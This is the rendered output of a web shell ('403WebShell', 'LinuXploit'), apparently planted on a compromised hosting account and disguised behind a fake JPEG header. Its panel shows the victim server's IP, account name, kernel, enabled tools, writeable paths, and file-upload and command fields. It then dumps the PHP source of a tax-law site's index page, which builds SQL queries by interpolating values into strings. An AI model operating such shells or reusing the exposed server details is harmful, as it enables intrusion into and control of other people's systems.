ÿØÿà JPEG ÿþ; 403WebShell
403Webshell
Server IP : 68.65.120.201  /  Your IP : 216.73.216.73
Web Server : LiteSpeed
System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : taxhyuvu ( 2294)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/taxhyuvu/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/taxhyuvu/public_html/index3.php
<?php include "head.php";

// include "admin/db.php";

?>
  

  <title>Taxhelpline</title>
  <meta name="description" content="Taxhelpline   website contains  Income tax | Sales tax | Customs |sales tax on Services | Case Laws | Judgments | SROs | STGOs | Board Clarifications | Customs Standing Orders | Customs Public Notices | Customs Valuation Rulings |Circulars | Acts | Rules | Ordiances |  ">
  <meta name="keywords" content="tax, help, line,tax, ta, x, fbr, taxhelpline, Sales, Income, Customs, sales tax on Services, Federal, excise, case laws, judgments, sros, stgos, board, clarification,standing, orders, public notices,circulars">


  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <!-- <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet">
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"></script>

  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Libre+Baskerville:wght@700&display=swap" rel="stylesheet"> -->
</head>
<style>
.head{width: 100%;height: 200px; 
    background-color: #ebebebf7;}

.head img{width: 300px;}
.img1st{margin: 0% 37%;
        padding-top: 62px;}

        .img1st h4{ padding: 0px;
            font-size: 1.0rem !important;
            margin: 0px;
            font-family: 'Jockey One';
            color: #0299A9;
            font-weight: 800;}
            .boxx{background-color: #049cae; border:2px solid #049cae ; 
                 display: flex;  justify-content: center;  align-items: center; transition: 0.5s;}
            .boxx:hover{    background: #049cae14; border: 2px solid #929a9d;transition: 0.5s; }
            .boxx:hover h1{   color: #929a9d; transition: 0.5s;}
            .boxx1{border:2px solid #929a9d; background-color: #929a9d; background-repeat: no-repeat;
                   background-size: 70%;  display: flex;  justify-content: center;  align-items: center; transition: 0.5s;}
            .boxx1:hover{background: #e2e2e2; border: 2px solid #049cae; transition: 0.5s;}
            .boxx1:hover h1{color: #049cae;transition: 0.5s;}
            .boxx,.boxx1{width: 100%;height: 110px;margin-top: 0%;transition: 0.5s;}
            .boxx h1{text-align: center;font-family: 'Libre Baskerville', serif; color: white; transition: 0.5s;}
            .boxx1 h1{text-align: center;font-family: 'Libre Baskerville', serif; color: white;transition: 0.5s;}
a{ text-decoration: none;}

.flip-box {
  background-color: transparent;
  width: 300px;
  height: 330px;
  /* border: 1px solid #f1f1f1; */
  perspective: 1000px; /* Remove this if you don't want the 3D effect */
}

/* This container is needed to position the front and back side */
.flip-box-inner {
  position: relative;
  width: 100%;
  height: 100%;
  text-align: center;
  transition: transform 0.8s;
  transform-style: preserve-3d;
}

/* Do an horizontal flip when you move the mouse over the flip box container */
.flip-box:hover .flip-box-inner {
  transform: rotateY(180deg);
}

/* Position the front and back side */
.flip-box-front, .flip-box-back {
  position: absolute;
  width: 100%;
  height: 80%;
  -webkit-backface-visibility: hidden; /* Safari */
  backface-visibility: hidden;
}

/* Style the front side (fallback if image is missing) */
/* .flip-box-front {
  background-color: #bbb;
  color: black;
} */

/* Style the back side */
.flip-box-back {
  background-color: dodgerblue;
  color: white;
  transform: rotateY(180deg);
}
.row {
    --bs-gutter-x: 0;
    --bs-gutter-y: 0;}


</style>
<script>
            setTimeout(function() {
  document.getElementById('myDiv').classList.add('animate');
}, 100);
        </script>
        <style>
            #myDiv {
  /* width: 100px;
  height: 100px;
  background-color: red; */
  opacity: 0;
  /* position: absolute;
  /* top: 50%; */
  /* left: 0; */ 
  transition: opacity 1s, left 1s;
}

#myDiv.animate {
  opacity: 1;
  left: 50%;
}
hr{    color: #c6c6c6 !important;}

@media (max-width: 1025px)
{
    .books{width: 95% !important; height: 280px !important;}
    .flip-box{width: 90% !important; height: 280px !important;}
    .bgis{width: 100% !important; height: 280px !important; }
    .flip-box-front, .flip-box-back {
    position: absolute;
    width: 100% !important;
    height: 200px !important;}
    .animate{margin-top:3% !important;}
.boxx, .boxx1{height:100px !important;}
}
@media (max-width: 1000px)
{
    
.flip-box {
  
    display: none !important;
}
    
}

.orderflip
{
    position: sticky;
    top: 100%;
    font-weight: bold;
    background: #05626f;
    border: #929a9d;
    width: 100%;
    border-radius: 0px;
    font-family: math;
    font-size: 20px;
    padding: 0px;
}
.orderflip:hover
{
    background:grey;
}

</style>

<?php  
    
    if (isset($_SESSION['logedin']) && $_SESSION['logedin'] == true) {
       $fv= $k['approve'];
        
       if ($fv== "v") {
       
    
        $ppp = $k['tdate'];
   
      $cdate= date ("d-M-Y");

if($cdate >= $ppp){
$eee= $_SESSION['Email_Address'];
    $heeloo="UPDATE `signup` SET `approve`='c'  WHERE `Email_Address` ='$eee'";
    mysqli_query($con,$heeloo);
    session_unset();
    
}else{
    echo'<div class="alert alert-warning alert-dismissible fade show" role="alert">
    <strong><i class="fa fa-exclamation-triangle" aria-hidden="true"></i>
    </strong>Your Account has been activated for three days. On  '.$ppp.'  your account will be suspended. Kindly contact us at <a href="contact"> Taxhelpline</a>
    <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
  </div>';
}}}
    ?> 

<body >
        <div class="container-fluid" id="myDiv"  style="margin-top: 2%;">
                <div class="row">
                        
                <div class="col-md-12">
                    <div class="row">
   <div class="col-md-4"></div>

   <div class="col-md-4" style="border: 1px solid #ced4da;margin-bottom: 27px;">
   <form method="post" action="Search.php">
   <input required type="text" placeholder="Search" class="form-control" style="border: none; border-radius: 0px;display: inline-block;height: 54px;    width: 60%; font-family: 'Libre Baskerville', serif;
    border: 1px solid #929a9d; " name="search">
            <select   class="form-select" aria-label="Default select example" style="border: none;border-left: 1px solid #828282;border-radius: 0px;    width: 20%;height: 54px;display: inline-block; font-family: 'Libre Baskerville', serif;
    border: 1px solid #929a9d;" name="select" required>
            <option value="" disabled selected hidden> - Select - </option>
            <option value="judgment">Judgment</option>
            <option value="Case Law">Case Law</option>
            <option value="Ordinance/Act">Ordinance/Act</option>
            <option value="Rules">Rules</option>
            <option value="Sros">SROs</option>
            <!-- <option value="Circulars">Circulars</option>
            <option value="Board">Board Clarifications</option>
            <option value="General">General Orders</option>
            <option value="Valuation">Valuation Rulings</option>
            <option value="Public">Public Notices & Standing Orders</option>
            <option value="Statutes">Statutes(Laws)</option> -->
            </select>
                        <button name="go" data-toggle="modal" data-target="#exampleModalCenter" type="submit" name=""  class=""style="border: none; border-radius: 0px;height: 54px; width: 18%;background: #929a9d;
    font-family: 'Libre Baskerville', serif;
    color: white;
                
                display: inline-block;">
                    Search </button>
                    </form>

   </div>
   <div class="col-md-4"></div>                 
   </div>
           </div>
                            <div class="col-xl-3 col-lg-3 asifg" >
                                <center>
                                    <a href="#">
                                        <div class="flip-box">
                                            <div class="flip-box-inner">
                                                <div class="flip-box-front">
                                                    <img alt="Sales Tax Law & Prcatice" src="publications/stlpss.png" class="books"  style="width: 100%; height: 330px;">
                                                </div>
                                                <div class="flip-box-back">
                                                        <div class="bgis" style="background-image:url(publications/stlpb.jpg);width: 100%; height: 330px;background-size:100%;background-repeat:round;">
                                                            <button style=""                                                   
                                                                class="btn btn-danger orderflip">Order Now
                                                            </button>
                                                        </div> 
                                                </div>
                                            </div>
                                        </div>
                                    </a>
                                </center>
                                <center>
                                    <a href="#">
                                        <div class="flip-box">
                                            <div class="flip-box-inner">
                                                <div class="flip-box-front">
                                                    <img alt="sales tax law And Prcat" src="publications/pcg.png" class="books"  style="width: 100%; height: 330px;">
                                                </div>
                                                <div class="flip-box-back">
                                                        <div class="bgis" style="background-image:url(publications/pcgb.png);width: 100%; height: 330px;background-size:100%;background-repeat:round;">
                                                            <button style=""                                                   
                                                                class="btn btn-danger orderflip">Order Now
                                                            </button>
                                                        </div> 
                                                </div>
                                            </div>
                                        </div>
                                    </a>
                                </center>   
                            </div>
                            <div class="col-xl-6 col-lg-6">
                                <!-- First  -->
                                <div class="col-xl-12 col-lg-12 col-md-12" style="margin-bottom:  4%;">   
                                    <center>
                                        <a href="incometax">
                                            <div class=" boxx" >
                                                <h1>Income Tax </h1>
                                            </div>
                                        </a> 
                                    </center>
                                </div>      
                                
                                <!-- Second -->
                                <div class="col-xl-12 col-lg-12 col-md-12" style="margin-bottom:  4%;">  
                                
                                    <center>    
                                        <a href="salestax">
                                            <div class="boxx1">
                                                <h1>Sales Tax </h1>
                                            </div>
                                        </a> 
                                    </center>
                                </div>   

                                <!-- Third -->
                                <div class="col-xl-12 col-lg-12 col-md-12" style="margin-bottom:  4%;">
                                    <center>    
                                        <a href="customs">
                                            <div class="boxx">
                                                <h1>Customs </h1>
                                            </div>
                                        </a> 
                                    </center>
                                </div>
                                  <!-- Fourth -->
                                  <div class="col-xl-12 col-lg-12 col-md-12" style="margin-bottom: 4%;">
                                    <center>    
                                        <a href="federalexcise">
                                            <div class="boxx1">
                                               <h1>Federal Excise </h1>
                                            </div>
                                        </a> 
                                    </center>
                                </div>
                                
                                <!-- Fifth -->
                                <div class="col-xl-12 col-lg-12 col-md-12" style="margin-bottom: 4%;" >
                                    <center>    
                                        <a href="salestaxon">
                                            <div class="boxx">
                                               <h1>Sales Tax on Services </h1>
                                            </div>
                                        </a> 
                                    </center>
                                </div>
                                
  
                            </div>    

                        
                              
                            <div class="col-xl-3 col-lg-3">
                            <div class="blue" style="margin:0px; margin-left: 30px;">

    <h3 style="font-family: 'Libre Baskerville', serif;
    color: #929a9d;">Case Laws on following Topics</h3>
    

<hr>


  
<marquee behavior="scroll"  direction="down" scrollamount="3" behavior="alternate"  height="600" loop="3">
 
 <?php  $has="SELECT * FROM `cases`ORDER BY `ID` Desc LIMIT 0,100";
    $data01=mysqli_query($con,$has);
   foreach ($data01 as $P ) { ?>


  <a href="viewreport?id=<?php echo $P['ID'] ?>" style="    border: 1px solid #1f9cad;
    border-left: none;
    border-right: none;"> 
  
  <p style="'font-fmaiLibre Baskerville', serif"></b> <?php echo $P['Topic'] ?></b>   
   </p></a>
<hr>

<?php  }?>



       </marquee></div>
                            </div>    
                        
                </div>
        </div>
        

<style>
.blue{border: 1px solid #1d939d;
    padding: 11px;
    /*width: 100%;*/
    
    /*height: 200px;*/
    margin-bottom: 20px;
    margin-top: 20px;
    color: #31363a;
    margin-right:10px;
   

}
    a:hover{color: rgb(50 54 58) !important;
    }
    .blue h3{display: inline;font-weight: 800;font-size: 24px;}

    .asan{font-family: math;    font-size: 18px;    color: white;}
    
.blue a{    color: #1e4045 !important;  transition: all .3s ease;}
.blue a:hover{    color: #000000 !important;  transition: all .3s ease;}




.blue:hover
{
    /* transform: translateY(-2px); */
    box-shadow: 0 10px 20px 0 rgba(5,19,79,.09);
    background: var(--bs-white)!important;
    /* filter:drop-shadow(0px 5px 5px rgba(0, 0, 0, 0.3)); */
    transition: all .3s ease;
}
.blue{scroll-behavior: smooth;position: relative; width: auto; height: 600px; line-height: 25px; overflow: scroll;}
.blue h3{display: sti;}
/* width */
::-webkit-scrollbar {
  width: 10px;
  
}

/* Track */
::-webkit-scrollbar-track {
  background: #f1f1f1; 
}
 
/* Handle */
::-webkit-scrollbar-thumb {
    background: #929a9d;
}

/* Handle on hover */
 ::-webkit-scrollbar-thumb:hover {
    background: #509ba5;
}

</style>

<script>
let scrollDiv = document.querySelector(".blue");
SimpleScrollbar.initEl(scrollDiv);
 </script>

        <hr style="margin-top:-20px;">
<div class="container-fluid  new" >
    <div class="row asan">
        <div class="col-xl-4 col-lg-4"><div class="blue">
    <h3>Case Laws</h3><img src="news-ticker.gif" alt="" style="margin-left: 10px; display: inline; width: 53px;">
<hr>
<ol>
    <?php  $has="SELECT * FROM `cases`ORDER BY `ID` Desc LIMIT 0,50";
    $data01=mysqli_query($con,$has);
   foreach ($data01 as $P ) {
 
       
    ?>
   <a href="viewreport?id=<?php echo $P['ID'] ?>"> <li style="text-align:justify;"><b> <?php echo $P['Judgment'] ?></b> | <?php echo $P['Court'] ?>  | <?php echo $P['Topic'] ?></b>   
   | <?php echo $P['Law'] ?> | <?php echo $P['Sections'] ?></li></a>
<hr>
<?php  }?>
</ol>
        </div></div>
        <div class="col-xl-4 col-lg-4"><div class="blue"><h3>Judgments</h3><img src="news-ticker.gif" alt="" style="margin-left: 10px; display: inline; width: 53px;"><hr>
        
            <ol>
            <?php  $has="SELECT * FROM `judgments`ORDER BY `ID` DESC LIMIT 0,50";
    $data01=mysqli_query($con,$has);
   foreach ($data01 as $P ) {
 
       
    ?>
   <a href="viewjudgment?id=<?php echo $P['ID'] ?>"> <li style="text-align:justify;"><?php echo $P['Court'] ?> | <b> <?php echo $P['PTD'] ?> </b> |
   <?php echo $P['Law'] ?> | <?php echo $P['Sect'] ?> 
   
                 </li></a>
    <hr>
<?php  }?>
            </ol>
        </div></div>
        <div class="col-xl-4 col-lg-4"><div class="blue"><h3>SROs</h3><img src="news-ticker.gif" alt="" style="margin-left: 10px; display: inline; width: 53px;"><hr>
            <ol>  <?php  $has="SELECT * FROM `sro`ORDER BY `ID` ASC LIMIT 0,50";
    $data01=mysqli_query($con,$has);
   foreach ($data01 as $P ) {
 
       
    ?>
              <a href="sros?tax=<?php echo $P['Catag'] ?>"> <li style="text-align:justify;"><?php echo $P['sron'] ?> | <?php echo $P['sub'] ?></a> 
                </li><hr>
                <?php } ?>
            </ol>
        </div></div>
    </div>
</div>

<hr>

<style>
    .section-title {
    text-align: center;
    padding-bottom: 25px;
}

.section-title h2 {
    font-size: 45px;
    font-weight: 900;
   
    margin-top: 3.5%;
    position: relative;
    color: #2a939c;
    font-family: math;
}
.asif{color: black;
    margin-top: 0%;
  
    padding-bottom: 20px;
    padding-top: 20px;
    display:flex;
    justify-content: center;
    align-items: center;
}
.asd
{
    border-color: hsla(0,0%,40%,.1)!important;

   border-radius:1rem!important;
}

.asd:hover
{
    transform: translateY(-2px);
    box-shadow: 0 10px 20px 0 rgba(5,19,79,.09);
    background: var(--bs-white)!important;
    /* filter:drop-shadow(0px 5px 5px rgba(0, 0, 0, 0.3)); */
    transition: all .3s ease;
}

@media (max-width:900px)
{
    
.boss h1, h5{text-align:center;}
.boss h6{padding-left: 5%;}    
}



</style>

<div class="section-title">
          <h2>Director Message</h2>
        </div>

    

<div class="container">

<div class="card asd" >
			<div class="row asif">

				<div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" style="color:black;">
					<center><img src="e.png" class="image-fluid" style="  width:250px; height:300px; "></center>

				</div>
				<div class="col-xl-9 col-lg-8 col-md-12 col-sm-12 boss">
						<h1 style="font-size: 35px;font-family:math; font-weight: bolder;" ><b>S.M. Ramzan Gillani</b></h1>
                        <h5 style="    font-size: 20px;font-family:math; "><b>Advocate High Court (MA , LL.B & LL.M)</b></h5>
						
							<h6 style="font-family:Math;font-size: 19px;line-height: 28px;color:#3e4447;text-align: justify;padding-right: 5%;">
                            We have launched website www.taxhelplines.com.pk and www.taxhelplines.pk. They are highly informative and useful websites for all the concerned people; Tax Managers, Tax Collectors Tax Consultants, Chartered Accountants, Lawyers and Students of Taxation. We have given preference to case laws and important paras or concluding paras of judgments side by side the detailed judgments, illustrations and other relevant information. We may continuously upload data day to day on our websites. The taxhelpline is very helpful for taxpayers and tax consultants. We are continuously working on research for the facilitation of trade and industries and solutions of their day to day tax problems. www.taxhelplines.com.pk and www.taxhelplines.pk is a climax of our achievements for taxpayers. You may learn more taxation at our website. We hope you will benefits of our research and experience. We shall welcome your suggestions for further improvement. You may also share authenticated information and tax materials.
									
				</div>
</div></div></div></div>
<br>

<?php
#include "slide/uslider.php";

include("footer.php");
?>

Youez - 2016 - github.com/yon3zu
LinuXploit